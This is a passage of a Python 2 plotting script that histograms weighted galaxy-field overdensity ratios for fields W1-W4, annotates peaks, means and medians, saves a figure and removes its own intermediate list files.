(bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W2_75(x))],np.average(q_W2_75),np.median(q_W2_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W3_75(x))],np.average(q_W3_75),np.median(q_W3_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W4_75(x))],np.average(q_W4_75),np.median(q_W4_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'${\\zeta_\\frac{M_{rms}^2}{r}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 13\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=27\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nx = linspace(0,3,500)\n\ngauss_q_W1_50 = gaussian_kde(q_W1_50)\ngauss_q_W2_50 = gaussian_kde(q_W2_50)\ngauss_q_W3_50 = gaussian_kde(q_W3_50)\ngauss_q_W4_50 = 
gaussian_kde(q_W4_50)\ngauss_q_W1_75 = gaussian_kde(q_W1_75)\ngauss_q_W2_75 = gaussian_kde(q_W2_75)\ngauss_q_W3_75 = gaussian_kde(q_W3_75)\ngauss_q_W4_75 = gaussian_kde(q_W4_75)\n\nplt.subplot(4,5,17)\nrangemax=8\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,17)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_50(x))],np.average(q_W1_50),np.median(q_W1_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W2_50(x))],np.average(q_W2_50),np.median(q_W2_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W3_50(x))],np.average(q_W3_50),np.median(q_W3_50))\ns = \"50: %.3f,%.3f,%.3f\" % 
(bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W4_50(x))],np.average(q_W4_50),np.median(q_W4_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W2_75(x))],np.average(q_W2_75),np.median(q_W2_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W3_75(x))],np.average(q_W3_75),np.median(q_W3_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W4_75(x))],np.average(q_W4_75),np.median(q_W4_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'${\zeta_\frac{M_{rms}^3}{r}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 14\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=29\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = 
np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,18)\nrangemax=7\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,18)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % 
(bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{zM}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 15\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=31\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,19)\nrangemax=10\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', 
linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,19)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % 
(bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{zM^2}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 16\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\nplt.legend(bbox_to_anchor=(1.5, 4), loc='center left', borderaxespad=0., fontsize=10)\n\n#plt.subplots_adjust(top=0.6)\n\nplt.tight_layout()\n\nplt.savefig('%s_overdensities_%s_size%s_i%s.png' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), dpi=1000)\n\n#plt.show()\n\nos.system(\"rm fieldshistW1_50_%s_%s_size%s_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\nos.system(\"rm fieldshistW2_50_%s_%s_size%s_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\nos.system(\"rm fieldshistW3_50_%s_%s_size%s_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\nos.system(\"rm fieldshistW4_50_%s_%s_size%s_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\nos.system(\"rm fieldshistW1_75_%s_%s_size%s_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\nos.system(\"rm fieldshistW2_75_%s_%s_size%s_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\nos.system(\"rm fieldshistW3_75_%s_%s_size%s_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\nos.system(\"rm fieldshistW4_75_%s_%s_size%s_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\n\nif str(sys.argv[2]) == \"samp\":\n    print(\" --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" },
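Illustration (not from the repository; the helper name and its defaults are hypothetical): a minimal numpy-only sketch of the per-sample summary the histogram script above prints, i.e. the mode taken as the left edge of the tallest normalized histogram bin, the mean, the median, and the fraction of points surviving the q < 10 cut.

import numpy as np

def summarize_overdensity(q_read, nbins=20, rangemax=10.0):
    # apply the same q < rangemax cut used before each histogram above
    q_read = np.asarray(q_read, dtype=float)
    q = q_read[q_read < rangemax]
    # normalized histogram, mirroring plt.hist(..., normed=1, range=[0, rangemax])
    n, bins = np.histogram(q, bins=nbins, range=(0.0, rangemax), density=True)
    mode = bins[np.argmax(n)]  # same as bins_q[np.argmax(n_q)] in the script
    return mode, np.average(q), np.median(q), float(q.size) / q_read.size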
